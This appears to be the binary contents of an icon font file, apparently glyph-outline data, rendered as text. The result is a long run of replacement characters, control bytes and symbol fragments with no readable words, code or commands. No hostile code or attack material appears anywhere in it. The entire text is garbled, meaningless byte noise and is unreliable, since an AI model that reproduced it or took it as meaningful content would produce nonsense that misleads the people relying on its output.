Z������07535#332>54.'".54>32#73#53-x-,M9!$=R//R=$!9M,(H55H((H55H(y��%=O-/R=$$=R/-O=%�[5G)(H55H()G5�xZx����.>#".=#354>323#32>73#53.#"#53#jjjjX/�/t/�/�		�<		�

���x

��I�����%+".'.+".54>;2;:>3>454.+".54>;2>54.+".54>;2>54.#*1#".54>;82132>54.+".'.4?>4'4.#81"+".54>;7>381232�		
�
??
�&+!�bNE]


t	
�	
	R��	@	

���%+#81".'.46?#".54>7.54>7.454>7.54>;2;2+".'.+";2+";2+"32+8"1#";:32>?>;2�E]


t	
		�
??
�
&+�aN��

@

	



S�Z����555�y2�2yL�Z>��k<\���!5!%735#3'7���~�zH�|�r�[�Ez�Ywg��d
7'7753#53'!5!��r~�zH�|���wf[�Ey�Y����	%'7537357'7!5!AVV22P2VV2��TVV2rr2Jrr2VV2�	����	73#'7%#37'3#Brr2VV2_2rr2VV��2VV2G22VV������#3#5#3#535##53%!353#35#335#�=[<�-��x[y.=��=vN0��j0N
����).38=BGLQ"32>54.#".54>32#7#533#57#53#537'7'73'7/7&&&&�ZZ��ZZ�@@�@@�@@�@@I&&&&��ZZ��ZZ�d@@�@@@@�@@���	'7!5!'773#���n��Tn�r��nnn����	%!'7!3#��n��nT��n��n������%7I.5'.5'372>=57>7.5%>7�!!!!BQFGQC�x	
=:+�*:>
	� 

 ""�<\; ;\>��~			��#4F*-E5!	O
����Ncx�!!!332>54.'5332>54.'5332>54.'53#".54>323#".54>323#".54>32�<��x<

	
Z		Z
	

<��xy���!	



	!!	



	!!	



	!�<y���"Am��4.'>5'4>45%.'.54>7.=62672>7544>7'7'&&.'.=3>72>75.'.=7>7>7-I[//[I--I[//[I-�0S="	*2882*	"=S00S=".5<3-'"=S0�*28/*$	.5<<5.	*2882*	.5<<5.	w'

'��'

'L

	





	

�;
1

3�			
00
	e



2	

	2
&�|%:`u4.#"32>7#0>7104041".54>32#%040414.#"32>7#0>71".54>32#�&''
*'1<5j�''')'1<5j''&'./]OLJ''&'./]OJ&�|%:`u%">5'3"232>'6.#".7&>32#%">7'#2"32>7.#".'>32#�
*&0=4&''

��	
((2;6'&&

�'/
/]O&&'��'/
/]O&&'����
%'#3735�9gyHOe2wl"d������|4O	���
&+05:#5'##3!535'#5'33!5!5!7#5!#5!+53#53'#533#53[��ZZLZ�FF��x����Z<��<�<xx�=+7~��]]�~AAy��9��]XX��<�����*/%#".54>732>54.'7#3�$=R//R=$/A&!9)5H((H5)8"&A/��/R=$$=R/'I;)	$3?")G55G)"?3$);I'��-Z����
 %*/432>=!#".=!'#533#533#57#53#53Z-=""=-��.%11%�xZZ����h� 6))6 ��,!!,xx�ZZZZ��ZZ�<��� +3%#".54>732>77+532'.'3�%=P,/R=$ 9L,&B15H('D5!=�.R>#0?$��-L9!$=R/,O=&!4E&(H52B'+�$=R/#@0�����#!";33335#".54>;�,  ,[=x�[  [� ++ ���[��!!����	$9Ti��!!!!%35>54.'5#72#".54>335>54.'5#72#".54>32>54.'5#352#".54>3��<��



				i



x

				���<�TT
		
VV

		
K	��
		


		
K	�		��		M				���%''7'7''7����N�M���N�N�������a��``BakJKKKJ5O��O
��
O��O`��37'.#"32>7&4&6'".'>32#�
�	!!
���



Zd��   7P��				$���;QVk.#"32>7940<1<0415.#"32>71%".54>32#5%".54>32#�
	 

 
	   ��:				X���				�� 

�5�  
aA�o			Y5Y5��				Z����-D["32>=4.##".=4>32'"32>=4.##".=4>32"=--=""=--="�%11%%11%�				�-<#�#<--<#�#<-��2%%2�2%%2��
<		<
j<<Z����(6"32>=4.##5'#54>7".=!#"=--=""=--="�y,!�y!,1%%1�-<#�#<--<#�#<-��#/��/#�>%2��2%���i�ER_%9"040#1'574.'5#389.5#35>54.''.54>7'5C2
	
!!	
7
	!!

	v
	
$B!
	
�&�

"//"*�

"//"Z


��

<����:Hi%2>=4.'5#335>335235#54>73#".=+#5#".=3;2>=31%!,,!%1K��&&-$2--2$&x&w%1Z.$$.Z1%+:OXXO:w-&&-b)ZZ)bbb��	5
5%5%�<�<�<�<�<>�=;�;=:��	#8M!5!!5!!5!"32>54.#"32>54.#"32>54.#�K��K��K��[						�<<�<<�==j����
/37'''3#7<�������yw�xz�xzZ+��,0M1#��"����$#������+5:DYn'.&'57'.54>7'#7'5>?4.&>54>7'.5�%$�����		� x�yy-!y		4h$$��+/I=/*%

%*/]3-!�!���ˊ!.3��%D

	

	���;73".54>;'7'7#"%2+7'7'32>54.#*5''51VV1*Q**1VV15''5�,!)77)1VU1 ,� ,,!2VV1)77)Z����+@U"7>54.#.54>32"32>54.#".54>32#"=-/8118/-="
.,!%11%!,.
!!!!				�-<#1lZ=

=Zl1#<-�E>NT%2$$2%TN>k!  !�	
		
		:�.3H]bw�5.54>64.'7>55''.54>7'4.&>5%5%'.54>64.'7>5��i�Z
		
[i��=
		
[i��=
		
h 

		�



� Z����+:Z";2>=4>7>54.##".=3#7#.'.54>32"=-


	<		
	-="<Z8
\
		%11%		�/@%+"
?



@
#+%@/�11�	

	$5((5%x����3#53#53#f�["�["��y��E�
%#535#5332>54.#"3E�65S6T		

2��4
	

	
whe%#".'1'84"9'.#"32>77##".54>32532>54.#"'71>32!,	m
!!,!!,
o!!
	
,!�, 
�!!	

 ,,!

�	!!$$	
!,�	���%'4>75.'.'.>740<=4>7>6"4.'#57>?0<1&>564.'&"#&04033%'575��<�k$
$

	


w��yy���k��/��
	
	


5
			2
�;x����3'#3#3#5'3#5#53�l�y"b"x�7�|&&hxxq��qZ<<�<������#'###!##'3#''7�Z�Z��[Y&��������-���������x�I%#".54>32.#"14>3234>7>76.'7




(/3'$
	



		!





x#+$	
	 	�8GV%.#";535#5#>32##332>=4.'#".=4>;%+532�%=P--P=%	-!4E''E4!-	�[��3YB&&BY3y	
�,M9!!9M,�
	y�y��y	���)6;@EJ_t%"32>7.#".'>32#'!3!7'3'%!!77!!%!7!%7!!%"32>'6.#".7&>32#�				

hW��W�!!�f59�X:H��;�?%u'�>��;z

h
	

	
=V_]�#��$�A<<�<yy�,,J��j
		
<:�%:!!7'!!77!!%"32>'6.#".7&>32#���W�W��1<�V=J��;z

���Ɔ[[��y
	

	
<���;Zy�����702815>7>54.'.".'."7>32>7#>32.'.54>7!3!5353''#3#5!537'37#'3�#'%

	


			%&$Z				"	
�		
	 !�����[ 2'"��
���x�ASh��7				


		



	�





�x��x�$�<<��=#���<<�'Q^s�5#;732>732>=4.'+'0#".#'#".=>735%3##5#53532>54.#"352#".54>3(VF-	6<98	-FV(�%;&%>$$8H))H8$���



	

	hZZ�	vv	���z{���=

	

	

=����
35!#5'!�Z� ��l��������������
"#3733#3'#'!'##'33!x��xz��EE�yL���EE��y���=y�(~7AA#�Z(~8AA��jy�<����	#!'#533!#���
ccӵ����`�4cc�Rė�����38'.7>.'/.657'74>2762'?���`��
	�kWT�?�R�T�t��aZ��8%	��2�ho�j�Z��<����	!!'!#3#3!7%#37'<��xQ*:*�wy ���yw �xZZ��"uD��E��"���!5!/#'7�nnn���nc��n������
'#'##33'37#7!#�U����S��U>>�=g<<���lN�IN)����"37'#5##3#33535#5'!!5!'7!�;;����;;����4#$��L��$#4+MJ�<INxx�<y,/[��.,ZI�/La%#53.''7.'#5'3#54>32##".54>7'7:6232#4.#"32>5��	"$$"
	��(F]55]F(�			>@	�$"
	ZZ	
"$5]E))E]5





mp
Z:��	ZL��.�����M�����)M75>;'7'7#"'1+32>717'7#"./.+32;7'
!	:2VV2: ]^^
�2:�	^^~
:2VV(
1VU1	
)s	

##
1
	�	
	�
1VVZ1��-5Z^���������1}�Z��	73#3#73##3Zxz><�zxZ<>��xj��L�x���L��Z)��7'5'7'7Z����T���������@vw�v����4)��7'7%'7��ݿ���ܦ����n�wwv�w����Xw$R".#"&3!2>54.#!".54>3:37>327>32#�


)"%$/##/��
#
$$X


!$$"//"�


		##�U_'5>54.&'.&'&&&7'.54>3>6>67'775#/SS$$
#
oo$$")


/#�VV22/""%
		

	$$
"		"0AUU3��1	�U_'5>54.&'.&'&&&7'.54>3>6>65'7'#/SS$$
#
oo$%")


/#�2VV2/""%
		

	$$
"		"0���1WW1����.!3#!#53!53>323'#54.#"#35�<D&�'EZ��]]ZZ���<��x�[yy[<<��+27<Qf�%#'##380132>58401380132>5840135+53'3#7".54>32#!".54>32#7#.#"#.#"#5!;>�Z><


�


<]uG.�i�C/Z'
	
�
	
'ijxx�				�ZZZZZ��				=



ZZ���(5##5##!##3#5#3#5!!53353353!�[�[ZZ=�j�<�<<[�[<�<��<�<<<<�Z
��+]====]���1H_".#".#"#70>3235>321'>32.#".#">323� +'"$() 
 
L

�*&#!"#%�&#$%#�		
�]���e��
c������16M%0.=4.#"!'%>=4>32!#533#".5332>5�-=""=-���
%11%
���		7$c#>..>#c#c3&&3ci�x			��� ,9FR^kx"32>'6.#>7#.'3'#7'#.'>7>7#.'3>73.''35]F((F]54_D))D_4�
	
ZZ
	
\C
[)$"
�X
&'�	ZZ	\
X'&�[


"$)�(F]55]F((F]55]F(� 

!!

 �"%&�
B�&%"�!

  

!�"%&�B�&%"
���
!5!%335#35733#35733#3��<<y�<x�=y�����Z����y����xj���
!5!'335#35'33#35'33#3��=y�<x�<y�����Z����y����xj<����%#".54>;'7'7#";��"=--="XPttPX1%%1�-=""<-PttO%12$I����%+'732>54.+532�-="XPttPX1%%1��"=-�"<-OutO%11%-="<��%#53#53#53Ħs���r6¦7s���r���
)@!3!35!!!5!32>54.+"3532+".54>3��<�x��<�ӗ		�



��
		
�y��Ky�Z-��K==�	
		
	Z3	��>S%'7'3'#'>7.#"#3.'7'732>77&>32#".7�/_7(.,

.,& 9
^0	+13)�



e^/%� 

 �%/^'++'0	

	

�	!5!!5!!5!!5!��Z��ZZ��-����xy�	!5!!!5!5!!5!�Z�Z��Z�-���y�y�	!5!!5!!5!!5!�������xy�	!5!!5!!5!!5!��-��Z-�i.���y�y����!!!#'3#".7&>32����s�	

	��K�=��Z�vv?-����Sh}��>54.#".'535#3.#"732>77'>54.''2.'>34>32.5".54>32#73#53�	

Z

		
&$ #''# $&
	:
		
��

		�%B11B%%B11B%y�

	

	



%" 
40

04
 "%

n	4	��1A&%B11B%&A1�xZ����
!&+5!!53#3#!#37#535#53'53#'3#53#5��x�<<��<<L��<�xx�<�<��Z�<�<<[[yZZx[[==���'6:!#"7.+'33!!'#'73373#'>;27#7_��MI


����y��"!!Y;�dd�<	����	���`��ZB����B=--5cc���	!!!5!!!#53+53+53��<�<�<�<=�<�[[�x��L-���	"',16;@EJOTY^chmrw|��������������������3#535#;5#;5#;5#;5#;5#35#;5#;5#;5#;5#;5#35#;5#;5#;5#;5#;5#;5#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#<<=<<<=��<=x<=��<=<<<=<������Z=<<<=<j=<<<=<<�<=<<<=<<"���	"',16;@EJOTY^chmrw|��������3#53#353#353#353#353#3535#35#;5#;5#;5#;5#;5#;5#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#'""#*#"&*#/"&"&#'./74&4&5/<&546<5?46465'7>?26263?26232237<1/./7.''./*#'0172263?>?>7'7>?0<5<[<<<=��<=<<<=<��+(


(++(
		

(+'$$''$$'��Z=<<<=<<�<=<<<=<<

(++(


(++(
$''$$''$!���	"',16;@EJOTY^chmrw|��������3#53#353#353#353#353#3535#35#;5#;5#;5#;5#;5#;5#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#%'7'<[<<<=��<=<<<=<�}��}��Z=<<<=<<�<=<<<=<<�|��|���8GL\"13!53!".50201223821!#";!%".=4>;##53'5!".54>3!#/


�;�/xV



V��"����j��
��

2t�x![

	
Zx=F((�y�
���	"',1!!#'373#/3##737'3#%3#53#5!5!5#73��GO�GXGX:GXGXSGXGX3GXGX��9G�{G4�<�TG
�<�Z<<[<<[<<<<<<<<<[<<�����<<�3W54.'54>75&'77>=''.='.=4>%7�	���

,



	�	yy[y�-,yD	;

�
CS/S�U�=|S���������.&77>54.'&&'01&"&"'7>5<.'75.54>7667>5<.'>5''.54>7.54>65'.54>6%5�M



	
u	f		
N	
ZF	+,,Z>J���+M	



v

g
		L?[
	G[���;��7J�Q��i*+1&".54>75#"*#*#*.'<>732>3>32"."#*.54>3:">'4.#"50&465>7>54.#"1>54.#0"#3>303812>732>774>7>54.#"54.#"04>54."#*30281>;3:023>;32>7"#*&47.54>7>54.#8"01"8132>77:63>454."'3#'4>7>54&041&04"'0*&1"&*#*#1>7>>4'4.#&1"#8"110>14>3>:3820120>7#.103861>74>564>51>454.#O
	
	u		

	
			
	6	q

		


				T


	

		

		
J
	
	
!%
		
	��Lav�"10>7>76.#>45.'.7>7>32%4>32#".574>32#".5.1>1
mL.4F)0cQ77]C�<QW
 .7
)$ 
���		�?jM,%cZ@�"c`I
$"#*fY<��	
 (,!		330�		KE+ !��.CN#2>7>76.2#".7&>32#".'>3>3.#�lM-5E*/dQ7
N�]t



�
		
)&b[?@iN+�"c`I
$"#1y^*_		w !E+��� -.''%''6>7%%''''�(+-%!	n�n�"�"�;��;==;�!!�w�;	
�YK���=;;=���"A%4.+?4.+"#"3!535!54>;'54>;232	�&
Z	&�	��<
�0Z0�
y	�j

e�	{{]]	�cd�	]'����
'777'3#�PPdd�NNff�0PPeePPee����3'.?7>54.'7''7'7>272�*���B���?@'Oa'98�@�*l*��A�	
�>@w`&;
�@�)���P3#3#!3#3#.54>327.#"#".'32>54.'Z<<Z�==[[�
				


	 
��x��x��	
	




		
����%'7'73#�eOOe��ePPe��6��-�'773#�PPdd^0PPee������#'!777777!3'7#5��	YL�p�����	�IYM����蠂�<����!&+7777!''''!#53#537#533#5<=.-----<�xj------ L[��<yyZ������K999999K��Y%999999'��w/y<xZ����73#57!5?/!/?#!5����!"


"!#	�$���QBB�%%��	
����7'7%'7?/'7/?���]Bo
/�/!��9t��
t�����!/�/
o(�t~�
����K�#(-#"74.#32#54>3'3#'53#=3#<	LJ	<<ZR ZZZZ�	����A	�x77U�������'Mbw��"'.54>7>27>54.#'.".54>32'"32>54.#".54>32#'".54>32#'#".54>322XA&$>T0'Rp
)&AX2}^":*!:L,,L:! #





Z				S�&AX20VA'R		p-3:2XA&�f^



	&6B%,L:!!:L,0,&�				Zi
	



	
�+)>Sh}"32>54.#".54>32#7"32>54.#".54>32#7"32>54.#".54>32#<		
		
		�				�
		
				+	
		
	ZZ	
		
	ZZ	
		
	Z�+)>7#".54>327"32>54.#3"32>54.#x	
		
	�				�
		
		�		
		
<	
		
		
		
	�����CQ>54.&57'5>55'.54>7'>7'^	"//"	"--"�	$$	*B
	
/""/
	�;=�6QxzO8

$$

��������$?#".5#32>5##53!#53".=332>=3#K�(@Q))Q@(�y[[��[[iD;'[&&[';D��1��0J22J0:ZZZZ�<(@.��%%��.@(�+	!5!!5!���+x��	"73#535#;5#;5##35#;5#735#HU�U�U���	73#535#735#xx�xx�xx����	!!!!��<����<���	"',16;@EJO!!!!%3#553#53#553#553#53#553#53#53#553#53#53#53#53#5��<�x.���<�y�xy��=-y=y<<=<����	"',16;@EJOTY^chmrw|���3#535#;5##35#;5#;5#;5#35#35#35#535#35#35#535#35#35##35#;5#;5##35##35#35#35#535#535#35#35#35#<�<�=<�=�<<�<�=��<�yK��<y�=<<���5#!!#53!3!53#����xxx��<�-yyy��Z���j[��-���
!!##53##53!3#5!!i���yyy�����yy�<���Z�======�������
#33!!3#553#!#535!���K��yyyyy����yx�ėZ�-=�xI�
5#353!5!3#553#���K��xx�yy�xZ[[�	!!!!%'7?'7'��<��GG11�11GG�Z��xj��nGG2222GG:�	7!!!!3#5!3#5<��xL����:L��.���������	"',16;@EJOTY^chmrw|��#335##35##35#;5#;5##35#535#535#35#535#35#35#35#535#7#35+35+353#3535#35#535#535#35#535#35#535#���5�56��5k5������x�<-y�Z<y<�<y ���	"',16;@EJOTY^chmrw|�������3#535##35##35##35##35##35#;5#!35#535#35#535#35#535#535#35#35#35##35#!35##35##35#;5##35##35#35#35#535#535#35#535#35#�=<<<y<j��<-<x����=�x<y�����<y�x�y���	"',16;@EJOTY^chmrw|��3#35#;5##35##35#;5#;5#35#35#535#535#35#35#35#35#35##35##35##35##35#35#535#535#35#535#535#35#����5k5�65659������<x<=��Z<�x�=����!!'!'!7?'����������V����<��v�ù�ͺ�
������
	!5!#53#3#5#53��x�ZZ�ZZKZZ
ZZZ����	"'!5!!5!!5!7!!5!5!7!!5!5!7!!5ZL��.����L����L����L�����ZZ<�ZZ<�ZZ<�[[<�
	735#73#535#73#5735##53��ZZ���ZZ���yZZ�ZZ<<ZZ<ZZ<�
	!5!3#5#53'3#5#53�ZZZZ�ZZ�ZZ
ZZ���	7!!5!5!!!!!<�<�-��-��<�XZ��K��Xh	"5%7'557'5757'5������A��Giii�����#��h������ xY= ���	%!5!!!5!!!!�x�[��-���<�wi�<��x�:�	5%%��<���k������	%!5!!!5!!!!i��-��-���<���<��x����	7!!5!5!!!!!�<-����<�XZ��K��Xh	"3#73#'73#73#'3#7!!73#7-��jh������������hy<x<��������	7!!5!5!!!!!�<Z�����<�XZ��K��:�h	!5!!5!!5!!!5�<��x���L����xh���xx<=:�	"'!5!!5!'3#535#!!5!5!'3#535#����K�����ZZ�����K�����ZZh[��y[[x[y��y[[�	!5!!5!35#!!5!5!35#����K���������K�����I<��Z[��:�	!5!!5!!!5!5!��Z��Z���Z��Z�I==x<<yXh	"#53#35'35#35#35#!!!5!�KK---ZZZZKK�Z��xK��IZ<�=�������%!5!�� ����	"',16;@EJOTY^chmrw|�������35#73#535#73#535#73#5735##5335#73#535#73#535#73#535#73#535#73#535#73#535#73#535#73#535#73#535#73#535#73#535#73#5ZZ[ZZZZZ[ZZ<�ZZZ[ZZZZZ[ZZ�xZZ[ZZZZZ[ZZ�xZZ[ZZZZZ[ZZhZZ<<ZZ<<ZZ<ZZ<�ZZ<<ZZ<<ZZ<<ZZ<�ZZ<<ZZ<<ZZ<<ZZ<�ZZ<<ZZ<<ZZ<<ZZ<���	"',16;@EJOTY35#73#535#73#5735##5335#73#535#73#535#73#535#73#535#73#535#73#5��ZZ���ZZ���yZZ���ZZ���ZZ���ZZ�x��ZZ���ZZ���ZZI��yZZy��yZZ��xZZӖ�xZZx��xZZx��xZZ�ӗ�xZZx��xZZx��xZZ����	"'35#73#5735##5335#73#535#73#5������ӵ���<���������
�ӵ���ӵ�����ӵ����ӵ���	"',16;@EJO3#535#35#!35#35#35#%35#35##35!#3535#35#%35#35#35#!35#ZZZZ��ZZZZ�yyyyxxxx�[[ZZ��yyyyxxxx��[[ZZ�[[[[[�[[[[.=[[�===<:�	'%5%5��<�<��.������M����;=:�	'%5%5��<�Z��.������M����Y=;:�	%!'!7!!!!37#���M[��=��ށ�����L���<<X�	#5335#%!!!!5#35�ӗ�����<���
<���.��=<<X�	#5335#%!!!!5#35���ӗ���<��
<���.��=<<����	"'3#3#3#3#3#3#73##3ZZ[ZZZZZ[ZZ< ��<���<���<����<���	3#3#3#3#73##3��ZZ���ZZ���yZZ ��<���<����<���	3#3#73##3�������ӵ� ��<����<���	!5!!5!!!7!!5!5!7!!5��<���<��<�ZZ<��������ZZ<���	!!!!!5!5!!��<�<�<�<�����==�<<���	"',16;!!!5!%35#73#5!5!7!!535#73#5!5!7!!535#73#5x��xj��K�ZZZ��xK���ZZZ��xK���ZZ����ӗZZ<��[[==[[=�ZZ<<ZZ<Z����	:5!97".54>32#5>54.#"'5!Z������y
		
y����Z�ι




�ў����)4I"32>54.#".54>32#73#535#53'4>32#".55]F((F]55]F((F]5/R=$$=R//R=$$=R/Z;7�(F]55]F((F]55]F(�$=R//R=$$=R//R=$m������)>s"32>54.#".54>32#7#".54>327#4>7>76.'.#"#>325]F((F]55]F((F]5/R=$$=R//R=$$=R/#	


	

!	�(F]55]F((F]55]F(�$=R//R=$$=R//R=$r�
	
	


���Zq��.#";;2>54.+"#".'3535#5#>32##332>=4.'32+".54>3'#".=4>;%+532�*9E%%E9*$RZ

ZR
 
%0::0%
-	�ZZ��+(C//C(	x
	"		
	�"7((7"�
x	��[x��xQ�����%#".=4>7>=4.#"#".=4.#"#".=4.#"#.=4.#"#./.#".=./.>76254>322>2322>2322>232�!cc

		

�``/&n�%��
	�	

	F	



���%+++".'.+".54>;2;2>54.#".74>;2>54.#".54>;2>54.#.54>;2>54.+".'&4>?>&'."+".54>;>?>32�
F	
	
	`		
`/&m�%��
�
�			

!cc

���%+"+".5<>5#".5<>5.5<>5#".54>;'.47>32+".'./.+";2";2#";2#";2>7>;2�`	


	F	

	�
��$�n&/`I

			

bb!K�����%"./#".=""#".'""#".=""#".=4>7>=4>3232>54>381232>5>3232>5>332>=4>3>67>&/4.'".=4>32�

		

!cc�
	�	

	F	



``/&n�%�����%%!!5!#''#5#775!!!53!#53��x���KN"Dl�H?&*��K���xK<Z�-�x[�d%u���yl)6Z<<�x<L���)Rg|"32>54.#".54>32#7#".54>3232>54>32%4>32#".534>32#".55]F((F]55]F((F]5/R=$$=R//R=$$=R/�%11%&&���(F]55]F((F]55]F(�$=R//R=$$=R//R=$�1%%1&&i���)Rg|"32>54.#".54>32#7#".54.#"#".54>32%4>32#".534>32#".55]F((F]55]F((F]5/R=$$=R//R=$$=R/�&&%11%���(F]55]F((F]55]F(�$=R//R=$$=R//R=$Z''2%%2��'6!"3!2>54.##!".=!54>3!2!�Z		�		�Z�<��<�
	��	

	.	
����..Z��?''%#3Z����/)����.vw�M�x�Z��7'73#��ݿ����߶n�vvw�;�x�K+��)"32>54.#".54>32#%B11B%%B11B%7))77))7�1B%%B11B%%B1��)77))77)<:��!'#7!5!��n�w�v�x����/�������+@\z%3#".5332>5'2>54.#"332>54.#"3#".'7.54>32#4.#"732>5�%11%&&�		x�$=R/
�V$=R//R=$5G)(H52a)G5�1%%1&&-/R=$V�
/R=$$=R/)G55G)a25H(���"7W\%4.'754.'''5'5''5''5''5''7%%54>7'54>7775	�		<		�	�'3�3��G�<��>��	n

g"

h��j�;=Y[xz;=���L@geBJ�,����*Ahv����^u2>7>=4.'.#"3'4>32#".=.4&=332>753#5#".'#54>32.'373#5.'.'."#*23:>7>7>5<.'##5#53#5#".'4.4=3332>7537#".'#53>327#32>56<53#".'.=4>7>32'#".'5>32�		Jc��#I('(('(	('(('(��YMaa3				z
2				2
g<<]pim��

/

KKrMM

�		

���phl�*�>	9
1

#=V���;.#*#2362#".'.'4&4&/.'.'"."#"2:>72>302232>7>7>764.'"'./.'.'.'.#""#0&401>7>7>3:2332>7>56.'.'>726:32�


 !		



#
!




		


	

				

�	'






		&">7-

8	'5< 			


	
			�i�#>7#.&.'".'441&"'&"&#7&&"'>50<#>7'&"&#>7>4'.'.'445>54.'".'46564>764.'.'465>7>45.<54>723301		'!=70


!#&)+IoL'R BeF	
	
	/26

	'&

!
5Wj5	E)`N6
					���)0"32>54.#".54>32#7#5335]F((F]55]F((F]5/R=$$=R//R=$$=R/����(F]55]F((F]55]F(�$=R//R=$$=R//R=$��x]����O�%'.'.5.=557262>7>?5#&'.'.'.='5>7>7>7267�rra

5			


5

	)rr
b	nj{

_�
			pP
�)

	y,�
		(���2w�%>54..'7>54.'./""'.54>?'.54>73>27'7'.54>7>54./.54>7'.&�-Lf8	
2%	-Lf8	
2%	p+K7!	'+K7!	'"+/#	
."**"
	 #�

5_@&1	

5_@&1	�
"6L*

& 8J,
	(�$


		


 
	


���:7.54>7'7'7&%%.=%>=�
-<#WOttOW2%
�[
�
M  !=,OusQ$2����

����:7'732'>54.+#!".=#3!2>=#�ttPX"<-
%1XP<�Z	�	�ttP-<"!	1%P���		�x����2>X%<54.1000>732>514.12#>3">73533.#i""%/.%Zv
		x		
�3839==98%-"ID	DI"-$$��	��	:����n'.'5.5&4>74>7.44>7>54.&'.54>7�*:#	
	

	
"
-!5&4N4*E0%+J5	 	
	#>3

	

,7!*&3$ @6!0;!����	#5'#53!35#!5#�����y����i����Z-�������	"'75!73'55#73'5'35?#57!5#57�������������������&�̮���Ȭ��s8����u;��&���"=�	>�5
5%5%577>54.'"2>675'1>54.&#62627'6&"&"'27>54.'��i��i��i��X
		4%	h �z  GT	
	�
T		
����@3#7";2>54.#"5#035<>7>32354.#hh4


1gg	


g +1��7��
-@|i�

��$4#���	"',16;@EJOTY^chmrw|�#33#!35##35#;5##35##35#35#35#35#535#535#535#35#535#;5#;5##35#;5#35#535#35#35#35#535#535#xx�ZZKg4h88h4g������<yx<x�y=y<�<=����	"',16;@EJO3#535#;5#735#35#;5#;5#;5#35#;5#;5#;5#35#;5#;5#;5#ZZyZZxZZyZZ��ZZyZZxZZyZZ��ZZyZZxZZyZZ��ZZyZZxZZyZZ�ZZZZZZZZZZ�ZZZZZZZZxZZZZZZZZyZZZZZZZZ	���	"',3#535#735#35#;5#;5#35#;5#;5#������������������������������������������������������	3#5!35#35#!35#����������������������	3#3#;#3#ZZyZZxZZyZZ��������	3#3#3#���������������	3#!3#���������<Qk�!"3!2>'.##!".'7332>7.'3'#".7&>32'.#"#'>3!2#7+".'7&>;2���+" -- "+[
 �� 
`&53(bp (**( 	 s
  
sD(*�!,��,!!,,!�x!!�4''4�y**))Z

=!!=c''���Vk�##5#53533#".54>7>7.54>7""#".54>7>;#'4.#"32>54.'*#"32>5O'OO'O�

""1*'02)%�*)#P
%,&")"�'OO'OO��
		
$

'( 
$* �,%
*$��		�)p�%#".54>32'"32>54.##".'.54>7.54>72>32>34.#""#*.'.#";2>5�	
		
	�		
		
b6@EGC9


E

/949/�		;		$$ !









!6  #++#rN)>7#".54>32!#".54>32#4.#"32>5�(((($((((



�((((((((



���w�###5354>;#"3w	Gi54+ G,
P8X�X5+X	
	,����"+0''757'7''7'7%7'7''5777'7��\\�^^h��g^^�jCkDiiii��jDkCCkDj?wv\\QjDkC\hLLhJKD.XX/CKJCE6B9�AAAAHE9B6�5B9FdFF
LL
dF9B5���.CSr��"32>54.#..'>70'.'>32'#>7<652:32>7.5>7#".'.'>25]F((F]55]F((F]5�,)&%# 
K
!#	
)'"�	"B9-
!+�0<D#)@1!		S.?(
'$!
#%)$�(F]55]F((F]55]F(��"%'�"!!' !"1*!�

'*'
#'+�
%)&4,"

"*1/("
*����d��%.7&>7>7.'.#"#".'.#"32>7>3232>7>7.'#0.'.#"#".'.'>7>3232>7>3201&>7>7�		

	


	



	
	
	

	

	
	

	
	

		|
	
�
				 '&'

	
c	$#"	
		
	;		



'����(?m���!+#".7'##".'5#".7''"32>7'6.#%!&>7'&6&65202>327&6:1'6.#"32>'3.#"32>7"32>'7.#s


)	+


	
F��		��k
	

4�	F		FF		F	���"())("?E�����"?!"3!2>''3'3#'37!!%+'!#".'&>;!'3���

�V�[�z�K����y./C�	�Z		Tyy���<�������B�����;Pe!3!2>'.##'37!!%+'!#".'73!'32"32>7.#".'>32#��V�

J���K����yC/.�''%%

�T��		�	<<�<<<sBZZ�Z<&&&&�A����9."#*7.'23:>7>723:>7((*	 !! 		

�#FFD"555456
,,,�����)5���%#".54>32#4.#"32>5%.54>7'02627264&#"10".'"3221'0262726.#"1*#>32"0*1"03#".'777>5<&4'�&AX22XA&&AX22XA&$?S00S?$$?S00S?$�]c+9K	

 -L	
%-2&$ 
9		=@�&?
�2XA&&AX22XA&&AX2/T?$$?T//T?$$?T/T��
&08
�E�X��"




����5-&���`.6'.'.'.'&>>7>7>7>.'�
# 	



'�	'
	
"#	
	

	
+'
"E=.�i'.'667>7.'666>7.'66"7.7&>7&6&4'>7>7>7�(KpH**%$ 
 	/8<"&
	

	
	H3lU7



#(%	
	l����K3#32>7#".'.'.'.=#5>7>7>73rr
			



5
	E�zK|

	L	
�D


	����1J%#!".54>3!24.+";2>534.+";2>=��F����������F���B��C����#(-29!*953353'537'77'77'77'77'7}��!� @����
�
���("k"k/(!(!Ʀ��7)(\()5'1(2/#`#`��	��w�I5Ng�����V{�72446"7'766667764544#'4646667660464"7'7"6666372054"6#'76"676204"4&7'76666776054"4'>4660676204"4&7'646&7"6066237254&4#'76"6762'"4"&40326660?725.4#'7646272&44&7'7"6066237'6"6"54446502166662722606"7"606#?"4".7'5?"6&666766223&&7.4'7">>2762627'�=D	%

�,+*11444444332255!N22&'c44iinn2233jj11hhyz+0��0�"

����T%.5<61'.54>674&<54>6.'1>6�%%q
%%
q%%%
qq
%S$$:	#%8&&$	97&����m%%.54>%'&'<5040417>54.&0.&>701>54.�!��!!.!�
KK

K

K
I 
"/"
 ��{%'	

%

'


��cx���� %#".'.'6&647.'>32>?>23>32#"./>32%>7.#"6.'.#"32>7>'".'>32##3".'4&647>23#2>74627#".7&>32732>'6.#".#">7�	"((*&$	!%&T		
K$#		
�Z
		�	
 %%'#"

"#'%% 
	���





	

	V	

�





	
f
			X	



#		

		
		
				0		Q				�		

�

�����"<>7>10.54>3232>54.#""'.54>32#".'032>54.#2XA&&5 

	


%,+@+#8("0
	2XA&&AX2�&AX2%D9-
+-$

	


#." *
6+&2$<,

&AX22XA&���	7'5555�������������������'�M'��	4�����,A[fq���%&'.#*#*#"#.'.'&>54.47>7>5"#&"3>.'..45>7>7>7.54>7>32##.'.67>7>.'.67'>4&'.'#.4'.'.'&>&'.#"&>3627><5.''&*54.#"72>4#".'4>2132>7>7>22.32>'..764*#>4&'.70>227>7>233>74.67>234>4.''0>5><#"7"30238205<.#"4>"#762#.#7*1262614.17.#>7:>50.1.2>5.'�



			
	
		

		
	



	
	

	
-	
		
		

				

�>!							 


		
	

	

		


	
�	



	
	
		
		
		


	

			
M�:v;��8�%'&&%".54>7.454>7>71>7.'.54>67>54.'>6.'7�"��#

		"'4'	��	

			$			$�#"	'2&
		!	
	#

